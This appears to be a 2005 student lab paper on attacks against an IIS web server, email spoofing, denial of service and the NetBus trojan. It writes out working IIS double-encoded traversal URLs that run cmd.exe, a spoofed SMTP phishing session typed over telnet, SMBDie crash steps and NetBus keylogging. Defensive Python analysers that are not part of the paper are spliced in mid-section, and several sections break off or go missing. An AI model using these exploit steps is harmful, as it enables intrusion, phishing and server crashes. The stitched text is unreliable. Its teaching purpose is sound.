Attacks Web Server, Email, DOS and Trojan Attacks | CS 5950, Papers of Computer Science

Material Type: Paper; Professor: Lilien; Class: Embedded Systems; Subject: Computer Science; University: Western Michigan University; Term: Fall 2005;


Uploaded on 07/29/2009

CS 5950-6030 NETWORK SECURITY, Dr. Leszek Lilien

Attacks: Web Server, Email, DOS and Trojan Attacks
Amit T Arakeswara, Rathna Kaliannan, Vrishal Dinar

Abstract—In today’s world, almost all computers are interconnected to one another. Though this is highly appreciable, it also becomes a necessity to safeguard the computer from outside attacks. The attacks could leave permanent or temporary damage to the computer. In either case a lot of time and money must be spent in fixing the problem. The study of various security flaws helps in understanding the possible vulnerabilities in a system and the ways by which they can be minimized.

Index Terms—exploit, social engineering, Trojan, vulnerability

I. INTRODUCTION

Computers today are highly vulnerable and fall prey to attacks from another person or system. This paper presents an explanation of the various types of attacks and the ways by which these attacks can be prevented.

II. WEB SERVER EXPLOITS

By default all Windows 2000 servers are pre-installed with Microsoft’s Internet Information Server (IIS). A number of vulnerabilities have been discovered since the release of IIS 5.0, and exploits were achieved through these vulnerabilities. A publicly available server must be maintained to retain its confidentiality, integrity and availability.

Here we will exploit the vulnerability explained in Common Vulnerabilities and Exposures, CVE-2001-0333 [19]. The vulnerability allows the execution of arbitrary commands by remote attackers by encoding “..” and “\” characters twice.

Manuscript received December, 2005. This work was supported by the Department of Computer Science, Western Michigan University.
Amit T Arakeswara is doing his graduate studies in Computer Science at Western Michigan University, Kalamazoo, MI-49008.
Rathna Kaliannan is doing his graduate studies in Electrical Engineering at Western Michigan University, Kalamazoo, MI-49008.
Vrishal Dinar is doing his graduate studies in Computer Science at Western Michigan University, Kalamazoo, MI-49008. (email: [email protected])

A. Setup

A Windows 2000 Server is exploited with the help of a Windows XP machine. The address of the server is typed into the Internet Explorer address bar of the XP machine. Let’s say http://192.168.100.102/ is the address of the server. The page returns the default page of the server [20].

B. The exploit

The exploit of the web server is done by typing http://192.168.100.102/scripts/..%255c../winnt/system32/cmd.exe?/c+dir. In the above hyperlink, scripts is the directory from which commands will be run. The ..%255c.. is the doubly encoded form of ..\.. that the web server’s check ignores but which is then used to traverse out of the Web root. The /winnt/system32/cmd.exe? is the command being called and /c+dir is the option to go with the command.

Now, the winnt directory could be viewed by adding \winnt to the address: http://192.168.100.102/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+\winnt.

A directory is created on the server by including the command c+mkdir+\exploit in the address bar, http://192.168.100.102/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+\. This will return an error since the command mkdir does not return anything. When the Refresh button is hit, it again returns an error but also shows that the directory exists.

Now a trojan or virus could be placed in the directory ‘exploit’. The cmd.exe is copied into the directory ‘exploit’ by http://192.168.100.102/scripts/..%255c../winnt/system32/cmd.exe?/c+copy+\winnt\system32\cmd.exe+\exploit
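The defensive lesson in the double-encoding bug above is that a server which validates a request path after one decoding pass and then decodes it again before use checks a different string than the one it executes. The following analyser (an added example, not code from the paper or from IIS) decodes a request path pass by pass and reports the first pass at which the canonical path climbs above the web root, so a request that only becomes ..\.. after the second pass is still flagged; the IIS-style log lines it scans are constructed for the example, and the three-pass limit is an assumption.

```python
"""Flag double-encoded path traversal of the kind CVE-2001-0333 describes.

Added example; not code from the paper.  A request path is URL-decoded pass
by pass and the canonical form checked after every pass, so a path that is
harmless after one decode but ..\.. after two is still reported.
"""
from urllib.parse import unquote

MAX_DECODE_PASSES = 3  # assumption: enough layers to expose realistic double encoding


def decode_passes(path: str, limit: int = MAX_DECODE_PASSES) -> list[str]:
    """Return [raw, decoded once, decoded twice, ...], stopping once stable."""
    passes = [path]
    for _ in range(limit):
        nxt = unquote(passes[-1])
        if nxt == passes[-1]:
            break
        passes.append(nxt)
    return passes


def escapes_root(path: str) -> bool:
    """True if the path climbs above the web root; IIS treats '\\' like '/'."""
    depth = 0
    for segment in path.replace("\\", "/").split("/"):
        if segment in ("", "."):
            continue
        if segment == "..":
            depth -= 1
            if depth < 0:
                return True
        else:
            depth += 1
    return False


def analyse(request_uri: str) -> dict:
    """Classify one request URI; the query string is ignored for the path check."""
    path = request_uri.split("?", 1)[0]
    passes = decode_passes(path)
    first_bad = next((i for i, p in enumerate(passes) if escapes_root(p)), None)
    return {
        "path": path,
        "passes": passes,
        # None = never leaves the root; 0 = plain ../; 1 = %5c; 2 = %255c (double-encoded)
        "traversal_pass": first_bad,
        "verdict": "block" if first_bad is not None else "allow",
    }


# Constructed IIS-style (W3C extended) log lines, not a real capture:
# date time client-ip method uri-stem uri-query status
SAMPLE_LOG = """\
2005-12-01 10:22:13 192.168.100.101 GET /default.htm - 200
2005-12-01 10:22:40 192.168.100.101 GET /scripts/..%255c../winnt/system32/cmd.exe /c+dir 200
2005-12-01 10:23:05 192.168.100.101 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404
2005-12-01 10:24:10 192.168.100.150 GET /images/logo.gif - 200
"""


def scan_log(log_text: str) -> list[tuple[str, str, int]]:
    """Return (client_ip, uri_stem, traversal_pass) for every flagged request."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 6:
            continue
        client_ip, uri_stem = fields[2], fields[4]
        result = analyse(uri_stem)
        if result["traversal_pass"] is not None:
            hits.append((client_ip, uri_stem, result["traversal_pass"]))
    return hits


if __name__ == "__main__":
    for ip, stem, n in scan_log(SAMPLE_LOG):
        print(f"{ip} {stem} -> traversal visible after {n} decoding pass(es)")
```

A filter that decodes once and looks for ".." would pass the %255c request, because after one pass it still reads ..%5c..; comparing the canonical path after every pass is what closes the gap, and the same check applied to logs after the fact shows which clients probed for the flaw.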

The cmd.exe copied into the ‘exploit’ directory is then used to perform an exploitation. This is done by issuing the address http://192.168.100.102/scripts/..%255c../exploit/cmd.exe?/c+dir+\exploit.

C. Verification and results

The exploit is verified by checking the directory ‘exploit’ on the Windows 2000 server and the presence of cmd.exe under it.

III. EMAIL SYSTEM EXPLOITS

One of the most widely used applications on the internet is e-mail. Though it is a very convenient way of communication, viruses can easily be delivered through it. The attacker spoofs his email address and sends the mail as if it were an authentic mail from a trusted company. The user would obviously be tricked into reading this mail. If he is not aware of spoofing and phishing, he might end up downloading an executable from the email. This executable could be a trojan or a virus. This way of tricking someone into doing something they would normally not do is called social engineering.

A. Exploit on a Linux client - Evolution

Evolution is configured on a Linux client. The server is named linuxserv.security.local. Let a user profile be created with the name ‘labuser’. On the Linux client we open Telnet by typing ‘telnet’. The ‘open’ command is issued by entering open 192.168.100.202 25, where 192.168.100.202 is the address of the server and 25 is the port of the SMTP mail server. Now a mail can be sent by issuing the following commands:

mail from: [email protected]
rcpt to: [email protected]
data

Write the following in the program:

From: [email protected]
To: [email protected]
Subject: Important update
MIME-Version: 1.0
Content-type: text/html; charset=us-ascii

Important update

Hi here!

Enter a “.” to complete the message. The word here! is a hyperlink reference. The reference ‘here!’ could call a file on the server that may be compromised in terms of security. This link could also be programmed to increment a counter, which would tell whether the object has been opened by a user or not. The logs stored on the server can be read by typing cat /var/log/httpd/access_log. Now when Evolution is opened, ‘labuser’ would find a mail in his or her inbox sent from [email protected]. Evolution can now be configured by specifying the host name as linuxserv.security.local and the username as [email protected]. When we click on the check-for-mail button, the mail will be delivered and the person is likely to be tricked into clicking the link.

B. Exploit on Windows - Outlook

Here a Windows 2000 server is used with XP Pro and a Linux server. Outlook Express is configured for ‘labuser’ by choosing the POP3 protocol. The incoming and outgoing mail server is set to linuxserv.security.local. A mail with the following code is sent by initiating a telnet session as explained earlier.

From: [email protected]
To: [email protected]
Subject: Important Update
MIME-Version: 1.0
Content-type: text/html; charset=us-ascii

<html><head><title>Important Updates</title></head>
<body bgcolor="#FF0000">
<h1>Important Updates</h1>
You need the Important Update
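Everything the attacker types in the telnet session above is under his control, so the receiving side has to judge the message by what it can verify: whether the envelope sender agrees with the From: header, where the “here!” link really points, and whether the link carries a per-recipient tag that feeds the open counter the paper mentions. The checker below is an added example, not the paper’s code or any mail product’s; the envelope, message, addresses and hosts are constructed placeholders (the paper’s addresses are redacted), and the finding codes are this example’s own.

```python
"""Inspect a spoofed HTML mail for the signs section III describes.

Added example, not code from the paper.  The SMTP envelope and the DATA
payload typed over telnet are reconstructed with placeholder addresses and
examined the way a mail gateway or security-aware client might.
"""
import email
import re
from email import policy
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlparse

# Constructed envelope and message; hosts and addresses are placeholders.
ENVELOPE_FROM = "<update@trusted-company.example>"
RAW_MESSAGE = """\
From: update@trusted-company.example
To: labuser@linuxserv.security.local
Subject: Important update
MIME-Version: 1.0
Content-Type: text/html; charset=us-ascii

<html><head><title>Important update</title></head><body>
<h1>Important update</h1>
Hi, please read the update <a href="http://192.0.2.10/cgi-bin/counter?user=labuser">here!</a>
</body></html>
"""


class LinkCollector(HTMLParser):
    """Collect (href, visible text) pairs from an HTML body."""

    def __init__(self):
        super().__init__()
        self.links: list[tuple[str, str]] = []
        self._href = None
        self._text: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def domain_of(addr: str) -> str:
    """Domain part of a bare or angle-bracketed address, lower-cased."""
    return addr.strip("<>").rsplit("@", 1)[-1].lower()


def inspect(envelope_from: str, raw_message: str) -> list[str]:
    """Return finding codes for one delivery attempt (empty list = nothing suspicious)."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    header_from = msg["From"].addresses[0].addr_spec
    recipient_local = msg["To"].addresses[0].username.lower()
    sender_domain = domain_of(header_from)
    findings = []

    # MAIL FROM and From: come from the same keyboard in this attack, so a
    # mismatch is only one signal; the link checks below do not depend on it.
    if domain_of(envelope_from) != sender_domain:
        findings.append("ENVELOPE_HEADER_MISMATCH")

    if msg.get_content_type() == "text/html":
        collector = LinkCollector()
        collector.feed(msg.get_content())
        for href, _text in collector.links:
            parts = urlparse(href)
            host = (parts.hostname or "").lower()
            if host and not host.endswith(sender_domain):
                findings.append("LINK_OUTSIDE_SENDER_DOMAIN")
            if re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}", host):
                findings.append("LINK_TO_IP_LITERAL")
            query_values = {v.lower() for vals in parse_qs(parts.query).values() for v in vals}
            if recipient_local in query_values:
                findings.append("TRACKING_ID_IN_LINK")
    return findings


if __name__ == "__main__":
    for code in inspect(ENVELOPE_FROM, RAW_MESSAGE):
        print(code)
```

The link checks are the useful part: a message claiming to come from trusted-company.example whose only link goes to a bare IP address and names the recipient in its query string is the counter-on-the-attacker’s-server pattern the paper describes, and it is visible before anyone clicks.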

This will result in packets being sent to the victim apparently from different hosts.

C. Ping

Ping stands for “Packet Internet Groper”. It is a utility that forwards data packets to check the quality of a link or verify the connection of a machine to the Internet. It provides a basic test of whether a particular host is operating properly and is reachable on the network from the testing host. Ping provides estimates of the round-trip time and packet loss rate between hosts. It works by sending ICMP “echo request” packets to the target host and listening for replies (ICMP “echo response” packets).

Steps for execution:
- In the command prompt type the following: ping
- This will give the packet information, the round trip time etc. if the host exists in the network; otherwise it will result in an operation timed out.

D. SMBDie

SMBDie is a tool which was created to exploit a problem with the Windows operating system and, when activated, will crash and Blue Screen the server immediately. SMB (Server Message Block) is the protocol Microsoft uses to share files, printers and serial ports, and also to communicate between computers using named pipes and mail slots. Clients make SMB requests for resources and servers make SMB responses in what is described as a client-server, request-response protocol.

An administrator can block access to SMB on TCP ports 445 and 139 at the network perimeter. This would block access from untrusted networks. However, legitimate users could be blocked in a ‘file and print’ networking environment. Administrators could also shut down the lanman server service. But this action would block legitimate users from using file and print services on the particular server where the lanman service had been stopped. The remedy for this is to download the patches from the following Microsoft sites based on the operating system/server installed. For Microsoft Windows 2000 it is http://www.microsoft.com/downloads/Release.asp?ReleaseID= and for Microsoft Windows XP it is http://www.microsoft.com/downloads/Release.asp?ReleaseID=

Steps for execution:
- Download the SMBDie tool from http://www.windowssecurity.com
- Extract the entire file into a folder and double-click on the executable.
- This will prompt for the IP address and the NetBIOS name of the server to be crashed.
- The NetBIOS name can be found by executing the command nbtstat -n in the command prompt.
- Press the “Kill” button; you will observe that the server has crashed and blue-screened immediately.

E. Ethereal

Ethereal is a network protocol analyzer, otherwise known as a "packet sniffer", which is a tool that captures and decodes packets of information from a network. Ethereal can capture live network traffic or read data from a file and translate the data to be presented in a format the user can understand. Network analyzers such as Ethereal are invaluable tools for administrators to diagnose and troubleshoot problems with, but are also used by intruders to obtain unauthorized information. Ethereal can be used to capture and analyze network packets and discover a wide array of information, such as:
- Troubleshooting network issues and locating bottlenecks
- Network intrusion detection
- Logging network traffic for forensic analysis
- Discovering a DoS (denial-of-service) attack

Steps for execution:
- Download Ethereal from http://www.ethereal.com
- Run the executable.
- List all the available capture interfaces by clicking the first option from the toolbar.
- Select the interface to be captured and sniff through all the packets on that interface.

V. TROJAN ATTACKS

A computer virus is a self-replicating program that spreads by inserting copies of itself into other executable code or documents [1]. It behaves in a way similar to a biological virus, which spreads by inserting itself into living cells. A Trojan horse is a similar kind of program, the only difference being that it is disguised as legitimate software. It is so named after the legendary ‘Trojan horse’ left on the shores of Troy by the Greeks to lull the Trojans into a false sense of belief that the war was over. We will be talking about two Trojan horse programs, hitherto referred to as ‘trojan(s)’:

1. Netbus
2. SubSeven

Netbus was one of the first ‘point and click’ types of Trojans out there, creating havoc among unsuspecting victims [2]. It was created by Carl-Frederik Neikter (cf) [3]. It, along with BackOrifice (© Cult of the Dead Cow), was at one time the lead Trojan program used by hackers/crackers to remotely access their victims’ computers. One of the most common ways for a Trojan program to get installed on a victim’s computer is when the unsuspecting user downloads and runs a ‘freeware game’ or any executable file off the internet, or from an infected removable diskette. Once the executable is run, however, the Trojan program (a server servicing ‘requests’ from ‘clients’ for connections) spreads through the system, replicating itself so that even if one copy gets deleted, the server will continue to function.

A. Netbus

NetBus 1.7 has the following ‘features’ as described by its author:
- Keylogger
- Mouse control
- Upload/download/delete ANY file
- Take screenshots/screendumps
- Shutdown/restart Windows
- Registry manager
- Open browser to a specific URL
- Record sounds from the mic
- Ultra-fast port scanner
- Port Redirect - redirects data to another host and port
- Server setup - configures the server-exe with some options, like TCP-port and mail notification
- Application Redirect - redirects I/O from console applications to a specified TCP-port
- Possibility to restrict access to only a few IP-numbers

In this project, we installed the NetBus Pro 2.0 server on a Windows 2000 Server system, and the client was installed on a laptop running Windows XP Professional. One really good feature of NetBus is that it can sniff a local network for any currently running servers and give details about them. This makes it really easy to work with, as we will know the IP address of the server. I made a search for NetBus servers on our network, and connected to the server program.

Once we got in, we were able to look up the entire system information of the server: the number of disk drives, the free space on each of them, their directory listing, etc. One of the first things that we did once we connected was to open the keylogger. This is a really good use, as the server also doubles up as a keylogger. One of our friends, who was working with me on this project, kept typing stuff on the screen and we could read each and every character, even typos! I was even able to send keys to him, making his computer believe that HE had typed those keys and not me. Another feature of NetBus that can be used to spy on an unsuspecting victim is the screenshot/screendump utility,
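The tools of sections IV and V all leave traces in captured traffic: a ping flood is a burst of ICMP echo requests from one source, an SMBDie attempt from outside needs TCP 139/445 to be reachable through the perimeter (the exposure the blocking advice in IV.D removes), and a NetBus client first sweeps the subnet for servers and then holds a session on the server’s TCP port. The triage below is an added example, not the paper’s code and not part of Ethereal; it runs over constructed flow records of the kind a sniffer decodes. The trusted /24, the thresholds and the NetBus port numbers (12345/12346, the NetBus 1.x defaults; the paper names no port) are assumptions.

```python
"""Triage captured flows for the conditions sections IV and V describe.

Added example, not code from the paper or from Ethereal.  Flow records such
as a sniffer would decode are checked for ICMP echo floods, SMB reachable
from untrusted networks, subnet sweeps on one port, and sessions on the
trojan control port.
"""
from collections import defaultdict
from ipaddress import ip_address, ip_network
from typing import NamedTuple

TRUSTED_NET = ip_network("192.168.100.0/24")  # assumed: the lab network the paper's addresses sit in
SMB_PORTS = {139, 445}                         # stated in section IV.D
TROJAN_PORTS = {12345, 12346}                  # assumed NetBus 1.x defaults; the paper names no port
ECHO_FLOOD_PER_SEC = 50                        # assumed threshold: echo requests per source per second
SWEEP_MIN_HOSTS = 8                            # assumed threshold: distinct targets on one port


class Flow(NamedTuple):
    ts: float      # seconds
    src: str
    dst: str
    proto: str     # "icmp-echo" or "tcp"
    dport: int     # 0 for ICMP


def constructed_capture() -> list[Flow]:
    """Sample traffic built for this example; not a real capture."""
    flows = []
    # 120 echo requests inside one second from one host: a ping flood
    flows += [Flow(100.0 + i / 120, "10.0.0.5", "192.168.100.102", "icmp-echo", 0) for i in range(120)]
    # a normal four-packet ping from a workstation
    flows += [Flow(101.0 + i, "192.168.100.50", "192.168.100.102", "icmp-echo", 0) for i in range(4)]
    # file sharing from inside (expected) and from outside the perimeter (not expected)
    flows.append(Flow(102.0, "192.168.100.50", "192.168.100.102", "tcp", 445))
    flows.append(Flow(102.5, "203.0.113.7", "192.168.100.102", "tcp", 445))
    # a NetBus client sweeping the /24 for servers, then connecting to the one it found
    flows += [Flow(103.0 + i / 100, "192.168.100.77", f"192.168.100.{i}", "tcp", 12345) for i in range(1, 21)]
    flows.append(Flow(104.0, "192.168.100.77", "192.168.100.102", "tcp", 12345))
    # ordinary web traffic
    flows.append(Flow(105.0, "192.168.100.50", "192.168.100.102", "tcp", 80))
    return flows


def triage(flows: list[Flow]) -> dict[str, set]:
    """Return the sources/pairs that trip each of the four checks."""
    findings = {"icmp_flood": set(), "smb_from_untrusted": set(), "port_sweep": set(), "trojan_port": set()}
    echo_per_second = defaultdict(int)   # (src, whole second) -> echo requests
    targets_on_port = defaultdict(set)   # (src, dport) -> distinct destinations
    for f in flows:
        if f.proto == "icmp-echo":
            echo_per_second[(f.src, int(f.ts))] += 1
            continue
        if f.proto != "tcp":
            continue
        if f.dport in SMB_PORTS and ip_address(f.src) not in TRUSTED_NET:
            findings["smb_from_untrusted"].add(f.src)
        if f.dport in TROJAN_PORTS:
            findings["trojan_port"].add((f.src, f.dst))
        targets_on_port[(f.src, f.dport)].add(f.dst)
    for (src, _second), count in echo_per_second.items():
        if count >= ECHO_FLOOD_PER_SEC:
            findings["icmp_flood"].add(src)
    for (src, dport), hosts in targets_on_port.items():
        if len(hosts) >= SWEEP_MIN_HOSTS:
            findings["port_sweep"].add((src, dport))
    return findings


if __name__ == "__main__":
    for name, hits in triage(constructed_capture()).items():
        print(f"{name}: {sorted(hits, key=str) or '-'}")
```

Port-based checks are only as good as the port list, so the sweep check matters most here: a NetBus server moved to another port is still found by a client that has to touch twenty hosts to locate it.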

VI. CONCLUSION

The vulnerability of the Windows 2000 web server is studied and tested. It therefore becomes necessary to apply the latest security updates and patches as soon as any operating system with IIS is installed. The denial of service attacks warn the users without firewalls. The SubSeven and Netbus trojans show how vulnerable a system could be in a networked environment. This, along with email spoofing, warns users to constantly scan their systems using updated anti-virus software.

ACKNOWLEDGMENT

We would like to thank our teacher, Dr. Leszek Lilien, for his continued support all throughout this semester, and for helping us out of any speed bumps we might have faced. We would also like to thank the lab administrators in room C- for letting us continue our work in spite of all the noise and the odd timings of our operation.

REFERENCES

[1] http://en.wikipedia.org/wiki/Computer_virus
[2] http://www.hackfix.org/netbusfix/
[3] http://www.windowsecurity.com/articles/The_Netbus_trojan.html
[4] http://www.cultdeadcow.com
[5] http://www.hackfix.org/SubSeven/
[6] http://www.tcp-ip-info.de/trojaner_und_viren/netbus_pro_eng.htm
[7] http://www.hackpr.net/~sub7/
[8] http://www.hackpr.net/~sub7/faq.shtml
[9] http://www.come.to/soul4blade
[10] http://www.ethereal.com
[11] http://www.fsf.org/
[12] http://www.gnu.org
[13] http://www.gnu.org/philosophy/free-sw.html
[14] http://www.windowssecurity.com.articles/SMBDie_Crashinf_Windows_Servers_with_Ease.html
[15] http://www.ss64.com/nt/nbtstat.html
[16] http://insecure.org/nmap/
[17] http://www.securityfocus.com/infocus/
[18] http://www.ethereal.com/distribution/win32/
[19] http://www.cve.mitre.org/
[20] Vincent J. Nestler, Wm. Arthur Conklin, Gregory B. White, Matthew P. Hirsch, “Computer Security Lab Manual”, McGraw-Hill, 2005
[21] Pfleeger and Pfleeger, “Security in Computing”, Third Edition, Prentice Hall PTR, 2003